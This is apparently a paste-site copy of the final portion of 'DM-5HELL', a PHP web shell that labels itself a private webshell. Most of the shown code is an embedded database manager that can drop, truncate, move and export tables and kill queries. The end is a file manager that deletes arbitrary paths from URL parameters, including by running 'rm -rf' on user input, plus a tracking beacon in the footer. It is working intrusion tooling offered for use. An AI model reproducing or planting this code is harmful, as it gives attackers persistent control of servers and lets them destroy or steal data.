  10429. foreach($Rh as $Id=>$W)
  10430. $_.=where_link($s++,$Id,$W);
  10431. }
  10432. $X=select_value($X,$_,$o,$rh);
  10433. $t=h("val[$Sh][".bracket_escape($y)."]");
  10434. $Y=$_POST["val"][$Sh][bracket_escape($y)];
  10435. $fc=!is_array($K[$y])&&is_utf8($X)&&$L[$_e][$y]==$K[$y]&&!$Xc[$y];
  10436. $qh=preg_match('~text|lob~',$o["type"]);
  10437. if(($_GET["modify"]&&$fc)||$Y!==null) {
  10438. $dd=h($Y!==null?$Y:$K[$y]);
  10439. echo "<td>".($qh?"<textarea name='$t' cols='30' rows='".(substr_count($K[$y], "\n")+1)."'>$dd</textarea>":"<input type='text' name='$t' value='$dd' size='$Zd[$y]'>");
  10440. }else{
  10441. $de=strpos($X, "<i>...</i>");
  10442. echo "<td id='$t' onclick=\"selectClick(this, event, ".($de?2:($qh?1:0)).($fc?"":",'".h('Use edit link to modify this value.')."'").");\">$X";
  10443. }
  10444. }
  10445. }
  10446. if($Oa)
  10447. echo "<td>";
  10448. $b->backwardKeysPrint($Oa,$L[$_e]);
  10449. echo "</tr>\n";
  10450. }
  10451. if(is_ajax())
  10452. exit;
  10453. echo "</table>\n";
  10454. }
  10455. if(($L||$E)&&!is_ajax()) {
  10456. $uc=true;
  10457. if($_GET["page"]!="last") {
  10458. if(!+$z)
  10459. $Uc=count($L);
  10460. elseif($x!="sql"||!$Cd) {
  10461. $Uc=($Cd?false:found_rows($S,$Z));
  10462. if($Uc<max(1e4,2*($E+1)*$z))
  10463. $Uc=@reset(@slow_query(@count_rows($a,$Z,$Cd,$ad)));
  10464. else
  10465. $uc=false;
  10466. }
  10467. }
  10468. if(+$z&&($Uc===false||$Uc>$z||$E)) {
  10469. echo "<p class='pages'>";
  10470. $ke=($Uc===false?$E+(count($L)>=$z?2:1):floor(($Uc-1)/$z));
  10471. if($x!="simpledb") {
  10472. echo '<a href="'.h(remove_from_uri("page"))."\" onclick=\"pageClick(this.href, +prompt('".'Page'."','".($E+1)."'), event); return false;\">".'Page'."</a>:",pagination(0,$E).($E>5?" ...":"");
  10473. for($s=max(1,$E-4); $s<min($ke,$E+5); $s++)
  10474. echo pagination($s,$E);
  10475. if($ke>0) {
  10476. echo ($E+5<$ke?" ...":""),($uc&&$Uc!==false?pagination($ke,$E):" <a href='".h(remove_from_uri("page")."&page=last")."' title='~$ke'>".'last'."</a>");
  10477. }
  10478. echo (($Uc===false?count($L)+1:$Uc-$E*$z)>$z?' <a href="'.h(remove_from_uri("page")."&page=".($E+1)).'" onclick="return !selectLoadMore(this, '.(+$z).', \''.'Loading'.'...\');" class="loadmore">'.'Load more data'.'</a>':'');
  10479. }else{
  10480. echo 'Page'.":",pagination(0,$E).($E>1?" ...":""),($E?pagination($E,$E):""),($ke>$E?pagination($E+1,$E).($ke>$E+1?" ...":""):"");
  10481. }
  10482. }
  10483. echo "<p class='count'>\n",($Uc!==false?"(".($uc?"":"~ ").lang(array('%d row','%d rows'),$Uc).") ":"");
  10484. $Sb=($uc?"":"~ ").$Uc;
  10485. echo checkbox("all",1, 0, 'whole result', "var checked = formChecked(this, /check/); selectCount('selected', this.checked?'$Sb':checked); selectCount('selected2', this.checked || !checked?'$Sb':checked);")."\n";
  10486. if($b->selectCommandPrint()) {
  10487. echo '<fieldset', ($_GET["modify"]?'':' class="jsonly"'), '><legend>Modify</legend><div>
  10488. <input type="submit" value="Save"', ($_GET["modify"]?'':' title="'.'Ctrl+click on a value to modify it.'.'"'), '>
  10489. </div></fieldset>
  10490. <fieldset><legend>Selected <span id="selected"></span></legend><div>
  10491. <input type="submit" name="edit" value="Edit">
  10492. <input type="submit" name="clone" value="Clone">
  10493. <input type="submit" name="delete" value="Delete"', confirm(), '>
  10494. </div></fieldset>
  10495. ';
  10496. }
  10497. $Sc=$b->dumpFormat();
  10498. foreach((array) $_GET["columns"] as $e) {
  10499. if($e["fun"]) {
  10500. unset($Sc['sql']);
  10501. break;
  10502. }
  10503. }
  10504. if($Sc) {
  10505. print_fieldset("export",'Export'." <span id='selected2'></span>");
  10506. $lf=$b->dumpOutput();
  10507. echo ($lf?html_select("output",$lf,$xa["output"])." ":""), html_select("format",$Sc,$xa["format"]), " <input type='submit' name='export' value='".'Export'."'>\n","</div></fieldset>\n";
  10508. }
  10509. echo (!$ad&&$M?"":"<script type='text/javascript'>tableCheck();</script>\n");
  10510. }
  10511. if($b->selectImportPrint()) {
  10512. print_fieldset("import",'Import', !$L);
  10513. echo "<input type='file' name='csv_file'> ",html_select("separator",array("csv"=>"CSV,","csv;"=>"CSV;","tsv"=>"TSV"),$xa["format"], 1);
  10514. echo " <input type='submit' name='import' value='".'Import'."'>","</div></fieldset>\n";
  10515. }
  10516. $b->selectEmailPrint(array_filter($kc, 'strlen'),$f);
  10517. echo "<p><input type='hidden' name='token' value='$Ah'></p>\n","</form>\n";
  10518. }
  10519. }
  10520. if(is_ajax()) {
  10521. ob_end_clean();
  10522. exit;
  10523. }
  10524. }elseif(isset($_GET["variables"])) {
  10525. $P=isset($_GET["status"]);
  10526. page_header($P?'Status':'Variables');
  10527. $hi=($P?show_status():show_variables());
  10528. if(!$hi)
  10529. echo "<p class='message'>".'No rows.'."\n";
  10530. else {
  10531. echo "<table id='menustable' cellspacing='0' border='1'>\n";
  10532. foreach($hi as $y=>$X) {
  10533. echo "<tr>","<td><span class='jush-".$x.($P?"status":"set")."'>".h($y)."</span>","<td>".nbsp($X);
  10534. }
  10535. echo "</table>\n";
  10536. }
  10537. }elseif(isset($_GET["script"])) {
  10538. header("Content-Type: text/javascript; charset=utf-8");
  10539. if($_GET["script"]=="db") {
  10540. $ah=array("Data_length"=>0,"Index_length"=>0,"Data_free"=>0);
  10541. foreach(table_status() as $C=>$S) {
  10542. json_row("Comment-$C",nbsp($S["Comment"]));
  10543. if(!is_view($S)) {
  10544. foreach(array("Engine","Collation") as $y)
  10545. json_row("$y-$C",nbsp($S[$y]));
  10546. foreach($ah+array("Auto_increment"=>0,"Rows"=>0) as $y=>$X) {
  10547. if($S[$y]!="") {
  10548. $X=format_number($S[$y]);
  10549. json_row("$y-$C",($y=="Rows"&&$X&&$S["Engine"]==($Qg=="pgsql"?"table":"InnoDB")?"~ $X":$X));
  10550. if(isset($ah[$y]))
  10551. $ah[$y]+=($S["Engine"]!="InnoDB"||$y!="Data_free"?$S[$y]:0);
  10552. }elseif(array_key_exists($y,$S))
  10553. json_row("$y-$C");
  10554. }
  10555. }
  10556. }
  10557. foreach($ah as $y=>$X)
  10558. json_row("sum-$y",format_number($X));
  10559. json_row("");
  10560. }elseif($_GET["script"]=="kill")
  10561. $g->query("KILL ".number($_POST["kill"]));
  10562. else {
  10563. foreach(count_tables($b->databases()) as $m=>$X) {
  10564. json_row("tables-$m",$X);
  10565. json_row("size-$m",db_size($m));
  10566. }
  10567. json_row("");
  10568. }
  10569. exit;
  10570. }else{
  10571. $jh=array_merge((array) $_POST["tables"], (array) $_POST["views"]);
  10572. if($jh&&!$n&&!$_POST["search"]) {
  10573. $I=true;
  10574. $pe="";
  10575. if($x=="sql"&&count($_POST["tables"])>1&&($_POST["drop"]||$_POST["truncate"]||$_POST["copy"]))
  10576. queries("SET foreign_key_checks = 0");
  10577. if($_POST["truncate"]) {
  10578. if($_POST["tables"])
  10579. $I=truncate_tables($_POST["tables"]);
  10580. $pe='Tables have been truncated.';
  10581. }elseif($_POST["move"]) {
  10582. $I=move_tables((array) $_POST["tables"], (array) $_POST["views"],$_POST["target"]);
  10583. $pe='Tables have been moved.';
  10584. }elseif($_POST["copy"]) {
  10585. $I=copy_tables((array) $_POST["tables"], (array) $_POST["views"],$_POST["target"]);
  10586. $pe='Tables have been copied.';
  10587. }elseif($_POST["drop"]) {
  10588. if($_POST["views"])
  10589. $I=drop_views($_POST["views"]);
  10590. if($I&&$_POST["tables"])
  10591. $I=drop_tables($_POST["tables"]);
  10592. $pe='Tables have been dropped.';
  10593. }elseif($x!="sql") {
  10594. $I=($x=="sqlite"?queries("VACUUM"):apply_queries("VACUUM".($_POST["optimize"]?"":" ANALYZE"),$_POST["tables"]));
  10595. $pe='Tables have been optimized.';
  10596. }elseif(!$_POST["tables"])
  10597. $pe='No tables.';
  10598. elseif($I=queries(($_POST["optimize"]?"OPTIMIZE":($_POST["check"]?"CHECK":($_POST["repair"]?"REPAIR":"ANALYZE")))." TABLE ".implode(",",array_map('idf_escape',$_POST["tables"])))) {
  10599. while($K=$I->fetch_assoc())
  10600. $pe.="<b>".h($K["Table"])."</b>: ".h($K["Msg_text"])."<br>";
  10601. }
  10602. queries_redirect(substr(ME, 0, -1),$pe,$I);
  10603. }
  10604. page_header(($_GET["ns"]==""?'Database'.": ".h(DB):'Schema'.": ".h($_GET["ns"])),$n, true);
  10605. if($b->homepage()) {
  10606. if($_GET["ns"]!=="") {
  10607. echo "<h3 id='tables-views'>".'Tables and views'."</h3>\n";
  10608. $ih=tables_list();
  10609. if(!$ih)
  10610. echo "<p class='message'>".'No tables.'."\n";
  10611. else {
  10612. echo "<form action='' method='post'>\n";
  10613. if(support("table")) {
  10614. echo "<fieldset><legend>".'Search data in tables'." <span id='selected2'></span></legend><div>","<input type='text' name='query' value='".h($_POST["query"])."'> <input type='submit' name='search' value='".'Search'."'>\n","</div></fieldset>\n";
  10615. if($_POST["search"]&&$_POST["query"]!="")
  10616. search_tables();
  10617. }
  10618. $Tb=doc_link(array('sql'=>'show-table-status.html'));
  10619. echo "<table id='menustable' border='1' cellspacing='0' class='nowrap checkable' onclick='tableClick(event);' ondblclick='tableClick(event, true);'>\n",'<thead><tr class="wrap"><td>
  10620. <input id="check-all" type="checkbox" onclick="formCheck(this, /^(tables|views)\[/);" class="js only">','<td>'.'Table','<td>'.'Engine'.
  10621. doc_link(array('sql'=>'storage-engines.html')), '<td>'.'Collation'.
  10622. doc_link(array('sql'=>'charset-mysql.html')), '<td>'.'Data Length'.$Tb, '<td>'.'Index Length'.$Tb, '<td>'.'Data Free'.$Tb, '<td>'.'Auto Increment'.
  10623. doc_link(array('sql'=>'example-auto-increment.html')), '<td>'.'Rows'.$Tb, (support("comment")?'<td>'.'Comment'.$Tb:''), "</thead>\n";
  10624. $T=0;
  10625.  
  10626. foreach($ih as $C=>$U) {
  10627. $ki=($U!==null&&!preg_match('~table~i',$U));
  10628. $t=h("Table-".$C);
  10629. echo '<tr'.odd().'><td>'.checkbox(($ki?"views[]":"tables[]"),$C, in_array($C,$jh, true), "","formUncheck('check-all');","",$t), '<td>'.(support("table")||support("indexes")?"<a href='".h(ME)."table=".urlencode($C)."' title='".'Show structure'."' id='$t'>".h($C).'</a>':h($C));
  10630. if($ki) {
  10631. echo '<td colspan="6"><a href="'.h(ME)."view=".urlencode($C).'" title="'.'Alter view'.'">'.(preg_match('~materialized~i',$U)?'Materialized view':'View').'</a>','<td align="right"><a href="'.h(ME)."select=".urlencode($C).'" title="'.'Select data'.'">?</a>';
  10632. }else{
  10633. foreach(array("Engine"=>array(),"Collation"=>array(),"Data_length"=>array("create",'Alter table'),"Index_length"=>array("indexes",'Alter indexes'),"Data_free"=>array("edit",'New item'),"Auto_increment"=>array("auto_increment=1&create",'Alter table'),"Rows"=>array("select",'Select data')) as $y=>$_) {
  10634. $t=" id='$y-".h($C)."'";
  10635. echo ($_?"<td align='right'>".(support("table")||$y=="Rows"||(support("indexes")&&$y!="Data_length")?"<a href='".h(ME."$_[0]=").urlencode($C)."'$t title='$_[1]'>?</a>":"<span$t>?</span>"):"<td id='$y-".h($C)."'>&nbsp;");
  10636. }
  10637. $T++;
  10638. }
  10639. echo (support("comment")?"<td id='Comment-".h($C)."'>&nbsp;":"");
  10640. }
  10641. echo "<tr><td>&nbsp;<td>".sprintf('%d in total', count($ih)), "<td>".nbsp($x=="sql"?$g->result("SELECT @@storage_engine"):""), "<td>".nbsp(db_collation(DB, collations()));
  10642. foreach(array("Data_length","Index_length","Data_free") as $y)
  10643. echo "<td align='right' id='sum-$y'>&nbsp;";
  10644. echo "</table>\n";
  10645. if(!information_schema(DB)) {
  10646. $ei="<input type='submit' value='".'Vacuum'."'".on_help("'VACUUM'")."> ";
  10647. $We="<input type='submit' name='optimize' value='".'Optimize'."'".on_help($x=="sql"?"'OPTIMIZE TABLE'":"'VACUUM OPTIMIZE'")."> ";
  10648. echo "<fieldset><legend>".'Selected'." <span id='selected'></span></legend><div>".($x=="sqlite"?$ei:($x=="pgsql"?$ei.$We:($x=="sql"?"<input type='submit' value='".'Analyze'."'".on_help("'ANALYZE TABLE'")."> ".$We."<input type='submit' name='check' value='".'Check'."'".on_help("'CHECK TABLE'")."> "."<input type='submit' name='repair' value='".'Repair'."'".on_help("'REPAIR TABLE'")."> ":"")))."<input type='submit' name='truncate' value='".'Truncate'."'".confirm().on_help($x=="sqlite"?"'DELETE'":"'TRUNCATE".($x=="pgsql"?"'":" TABLE'"))."> "."<input type='submit' name='drop' value='".'Drop'."'".confirm().on_help("'DROP TABLE'").">\n";
  10649. $l=(support("scheme")?$b->schemas():$b->databases());
  10650. if(count($l)!=1&&$x!="sqlite") {
  10651. $m=(isset($_POST["target"])?$_POST["target"]:(support("scheme")?$_GET["ns"]:DB));
  10652. echo "<p>".'Move to other database'.": ",($l?html_select("target",$l,$m):'<input type="text" name="target" value="'.h($m).'" autocapitalize="off">'), " <input type='submit' name='move' value='".'Move'."'>",(support("copy")?" <input type='submit' name='copy' value='".'Copy'."'>":""), "\n";
  10653. }
  10654. echo "<input type='hidden' name='all' value='' onclick=\"selectCount('selected', formChecked(this, /^(tables|views)\[/));".(support("table")?" selectCount('selected2', formChecked(this, /^tables\[/) || $T);":"")."\">\n";
  10655. echo "<input type='hidden' name='token' value='$Ah'>\n","</div></fieldset>\n";
  10656. }
  10657. echo "</form>\n","<script type='text/javascript'>tableCheck();</script>\n";
  10658. }
  10659. echo '<p class="links"><a href="'.h(ME).'create=">'.'Create table'."</a>\n",(support("view")?'<a href="'.h(ME).'view=">'.'Create view'."</a>\n":"");
  10660. if(support("routine")) {
  10661. echo "<h3 id='routines'>".'Routines'."</h3>\n";
  10662. $qg=routines();
  10663. if($qg) {
  10664. echo "<table id='menustable' cellspacing='0' border='1'>\n",'<thead><tr><td>'.'Name'.'<td>'.'Type'.'<td>'.'Return type'."<td>&nbsp;</thead>\n";
  10665. odd('');
  10666. foreach($qg as $K) {
  10667. echo '<tr'.odd().'>','<td><a href="'.h(ME).($K["ROUTINE_TYPE"]!="PROCEDURE"?'callf=':'call=').urlencode($K["ROUTINE_NAME"]).'">'.h($K["ROUTINE_NAME"]).'</a>','<td>'.h($K["ROUTINE_TYPE"]), '<td>'.h($K["DTD_IDENTIFIER"]), '<td><a href="'.h(ME).($K["ROUTINE_TYPE"]!="PROCEDURE"?'function=':'procedure=').urlencode($K["ROUTINE_NAME"]).'">'.'Alter'."</a>";
  10668. }
  10669. echo "</table>\n";
  10670. }
  10671. echo '<p class="links">'.(support("procedure")?'<a href="'.h(ME).'procedure=">'.'Create procedure'.'</a>':'').'<a href="'.h(ME).'function=">'.'Create function'."</a>\n";
  10672. }
  10673. if(support("sequence")) {
  10674. echo "<h3 id='sequences'>".'Sequences'."</h3>\n";
  10675. $Cg=get_vals("SELECT sequence_name FROM information_schema.sequences WHERE sequence_schema = current_schema() ORDER BY sequence_name");
  10676. if($Cg) {
  10677. echo "<table id='menustable' cellspacing='0' border='1'>\n","<thead><tr><td>".'Name'."</thead>\n";
  10678. odd('');
  10679. foreach($Cg as $X)
  10680. echo "<tr".odd()."><td><a href='".h(ME)."sequence=".urlencode($X)."'>".h($X)."</a>\n";
  10681. echo "</table>\n";
  10682. }
  10683. echo "<p class='links'><a href='".h(ME)."sequence='>".'Create sequence'."</a>\n";
  10684. }
  10685. if(support("type")) {
  10686. echo "<h3 id='user-types'>".'User types'."</h3>\n";
  10687. $ci=types();
  10688. if($ci) {
  10689. echo "<table id='menustable' cellspacing='0' border='1'>\n","<thead><tr><td>".'Name'."</thead>\n";
  10690. odd('');
  10691. foreach($ci as $X)
  10692. echo "<tr".odd()."><td><a href='".h(ME)."type=".urlencode($X)."'>".h($X)."</a>\n";
  10693. echo "</table>\n";
  10694. }
  10695. echo "<p class='links'><a href='".h(ME)."type='>".'Create type'."</a>\n";
  10696. }
  10697. if(support("event")) {
  10698. echo "<h3 id='events'>".'Events'."</h3>\n";
  10699. $L=get_rows("SHOW EVENTS");
  10700. if($L) {
  10701. echo "<table id='menustable' cellspacing='0' border='1'>\n","<thead><tr><td>".'Name'."<td>".'Schedule'."<td>".'Start'."<td>".'End'."<td></thead>\n";
  10702. foreach($L as $K) {
  10703. echo "<tr>","<td>".h($K["Name"]), "<td>".($K["Execute at"]?'At given time'."<td>".$K["Execute at"]:'Every'." ".$K["Interval value"]." ".$K["Interval field"]."<td>$K[Starts]"), "<td>$K[Ends]",'<td><a href="'.h(ME).'event='.urlencode($K["Name"]).'">'.'Alter'.'</a>';
  10704. }
  10705. echo "</table>\n";
  10706. $sc=$g->result("SELECT @@event_scheduler");
  10707. if($sc&&$sc!="ON")
  10708. echo "<p class='error'><span class='jush-sqlset'>event_scheduler</span>: ".h($sc)."\n";
  10709. }
  10710. echo '<p class="links"><a href="'.h(ME).'event=">'.'Create event'."</a>\n";
  10711. }
  10712. if($ih)
  10713. echo "<script type='text/javascript'>ajaxSetHtml('".js_escape(ME)."script=db');</script>\n";
  10714. }
  10715. }
  10716. }
  10717. echo'</table></center><br /><br />';
  10718. //phpmyadmin
  10719. }else{
  10720. if(isset($_GET['delete']) && ($_GET['delete'] != "")){
  10721. $file=$_GET['delete'];
  10722. if(unlink($file)){
  10723. }else{
  10724. palbtn($file);
  10725. }
  10726. }elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){
  10727. $fdir=$_GET['fdelete'];
  10728. if(delete_option($fdir)){
  10729. }elseif(exe('rm -rf '.$fdir)){
  10730. }else{
  10731. palbtn($fdir);
  10732. }
  10733. }elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){
  10734. mkdir($pwd.$_GET['mkdir']);
  10735. }
  10736. $buff=showdir($pwd,$prompt);
  10737. echo $buff;
  10738. }
  10739. echo'
  10740. <!-- DM-5HELL FOOTER -->
  10741. <div align="center">
  10742. <br>
  10743. <!-- DM-5HELL -->
  10744. <br>
  10745. <table class="tabnet" style="width:700px;border:1px solid #0f0">
  10746. <tr><td align="center" colspan="2">
  10747. <span style="color:#0f0">WE DO IT WE WANT BECAUSE WE CAN</span>
  10748. </td></tr>
  10749. <tr><td align="center" colspan="2">
  10750. <span style="color:#0f0">DM PRIVATE PHP WEBSHELL &copy; 2014 </span>
  10751. </td></tr>
  10752. <tr><td align="center" colspan="2"><span style="color:#0f0"><img src="//sstatic1.histats.com/0.gif?3522913&amp;101"><script>Y=new Date;var dm=Y.getUTCFullYear();document.write("Copyright &copy; 2014 - "+dm)</script></span></td></tr>
  10753. </table><br><br>
  10754. <!-- DM-5HELL -->
  10755. </div>
  10756. </div>
  10757. </body>
  10758. </html>';
  10759. ob_end_flush();
  10760. ?>
Add Comment
Please, Sign In to add comment